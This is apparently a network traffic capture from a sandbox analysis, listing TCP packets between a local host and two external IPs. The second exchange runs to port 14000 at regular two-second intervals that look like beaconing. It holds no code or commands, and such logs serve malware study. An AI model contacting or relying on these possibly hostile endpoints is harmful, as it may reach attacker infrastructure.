Nov 22, 2024 17:12:14.771178007 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:14.771186113 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:14.771238089 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:14.777374983 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:14.777398109 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:14.777446985 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:14.777455091 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:14.777504921 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:14.783169985 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:14.783185959 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:14.783260107 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:14.783267021 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:14.783320904 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:14.789408922 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:14.789429903 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:14.789489985 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:14.789498091 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:14.789529085 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:14.794723988 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:14.794743061 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:14.794800997 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:14.794809103 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:14.794847965 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:14.954449892 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:14.954477072 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:14.954576015 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:14.954606056 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:14.954659939 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:14.960777998 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:14.960809946 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:14.960854053 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:14.960889101 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:14.960926056 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:14.960948944 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:14.966054916 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:14.966082096 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:14.967061996 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:14.967107058 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:14.967195034 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:14.972328901 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:14.972352982 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:14.972450972 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:14.972462893 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:14.972501993 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:14.978565931 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:14.978591919 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:14.978657007 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:14.978677988 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:14.978719950 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:14.984406948 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:14.984431028 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:14.984603882 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:14.984620094 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:14.984662056 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:14.990710974 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:14.990765095 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:14.990827084 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:14.990845919 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:14.990889072 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:14.996211052 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:14.996227026 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:14.996310949 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:14.996320963 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:14.996366024 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.155678988 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.155705929 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.155797958 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.155834913 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.155951023 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.161984921 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.162024021 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.162079096 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.162096024 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.162110090 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.163897991 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.168009996 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.168031931 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.168082952 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.168095112 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.168139935 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.168155909 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.173583984 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.173605919 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.173670053 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.173683882 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.173723936 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.179786921 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.179805040 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.179868937 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.179881096 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.179919004 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.185619116 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.185637951 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.185703039 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.185714006 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.185749054 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.191833019 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.191869020 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.191931009 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.191941023 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.191956043 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.195882082 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.197252989 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.197272062 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.197321892 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.197330952 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.197454929 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.357570887 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.357594967 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.357676029 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.357686996 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.357729912 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.613209963 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.613234997 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.613311052 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.613329887 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.613362074 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.613380909 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.613393068 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.613430023 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.613437891 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.613460064 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.613478899 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.613477945 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.613531113 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.613537073 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.613552094 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.613567114 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.613614082 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.613619089 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.613626957 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.613642931 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.613676071 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.613686085 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.613715887 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.613725901 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.613729954 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.613756895 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.613795042 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.613893032 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.613930941 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.614001036 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.614006042 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.614017963 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.614043951 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.614077091 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.614083052 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.614097118 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.614113092 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.614115000 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.614139080 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.614144087 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.614167929 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.614240885 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.614258051 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.614288092 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.614294052 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.614320040 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.614327908 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.614341974 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.614379883 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.614387035 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.614403963 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.614413023 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.614425898 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.614455938 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.614463091 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.614484072 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.614487886 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.614500046 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.614521980 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.614528894 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.614538908 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.614557981 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.614558935 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.614612103 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.614618063 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.614752054 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.760130882 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.760157108 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.760230064 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.760271072 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.760292053 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.760317087 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.766185045 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.766208887 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.766252995 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.766263962 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.766289949 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.766318083 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.772325993 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.772346020 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.772407055 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.772443056 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.772474051 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.772516012 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.782042027 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.782061100 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.782113075 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.782138109 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.782171011 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.782191038 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.785881042 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.785902023 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.785964966 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.785988092 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.786048889 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.790951014 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.790972948 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.791023016 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.791043043 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.791074991 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.791090965 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.796061039 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.796082973 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.796153069 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.796166897 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.796216965 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.799626112 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.799658060 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.799710035 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.799721956 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.799738884 CET	443	49744	77.91.73.101	192.168.2.5
Nov 22, 2024 17:12:15.799746037 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.799777031 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:15.800379992 CET	49744	443	192.168.2.5	77.91.73.101
Nov 22, 2024 17:12:22.401619911 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:12:22.521338940 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:12:22.521410942 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:12:23.524406910 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:12:23.645222902 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:12:23.645414114 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:12:24.997194052 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:12:25.002530098 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:12:25.122503996 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:12:25.427056074 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:12:25.477536917 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:12:25.509439945 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:12:25.694502115 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:12:25.694565058 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:12:25.694668055 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:12:25.725898981 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:12:25.725935936 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:12:25.814604998 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:12:25.814640045 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:12:25.814713001 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:12:25.814740896 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:12:26.182018042 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:12:26.227550983 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:12:28.196254015 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:12:28.316019058 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:12:30.321285009 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:12:30.440865040 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:12:32.446408033 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:12:32.565983057 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:12:34.571285009 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:12:34.690756083 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:12:34.715704918 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:12:34.747040033 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:12:34.866828918 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:12:36.868208885 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:12:36.990806103 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:12:38.993180990 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:12:39.112766981 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:12:41.118206024 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:12:41.237827063 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:12:43.243199110 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:12:43.362917900 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:12:45.368479967 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:12:45.488820076 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:12:47.493191957 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:12:47.612709045 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:12:49.618211985 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:12:49.722125053 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:12:49.737750053 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:12:49.761264086 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:12:49.881036043 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:12:51.883882046 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:12:52.004206896 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:12:54.008959055 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:12:54.128834963 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:12:56.133961916 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:12:56.253623009 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:12:58.258838892 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:12:58.378353119 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:13:00.383920908 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:13:00.503822088 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:13:02.508869886 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:13:02.628842115 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:13:04.635546923 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:13:04.728024006 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:13:04.755400896 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:13:04.774502993 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:13:04.774705887 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:13:04.894951105 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:13:06.899631023 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:13:07.019289970 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:13:09.024594069 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:13:09.144377947 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:13:11.149502993 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:13:11.269052029 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:13:13.274502993 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:13:13.394293070 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:13:15.399503946 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:13:15.519165993 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:13:17.524511099 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:13:17.646866083 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:13:19.649514914 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:13:19.731971979 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:13:19.769200087 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:13:19.774655104 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:13:19.774746895 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:13:19.894263983 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:13:21.899621010 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:13:22.019237041 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:13:24.024676085 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:13:24.144382954 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:13:26.149558067 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:13:26.269162893 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:13:28.274645090 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:13:28.394167900 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:13:30.399571896 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:13:30.519128084 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:13:32.524580956 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:13:32.644510031 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:13:34.649590015 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:13:34.738838911 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:13:34.774763107 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:13:34.775791883 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:13:34.894336939 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:13:36.899590015 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:13:37.019303083 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:13:39.025019884 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:13:39.144762993 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:13:41.149749041 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:13:41.269630909 CET	14000	49786	172.86.76.228	192.168.2.5
Nov 22, 2024 17:13:43.274581909 CET	49786	14000	192.168.2.5	172.86.76.228
Nov 22, 2024 17:13:43.396148920 CET	14000	49786	172.86.76.228	192.168.2.5
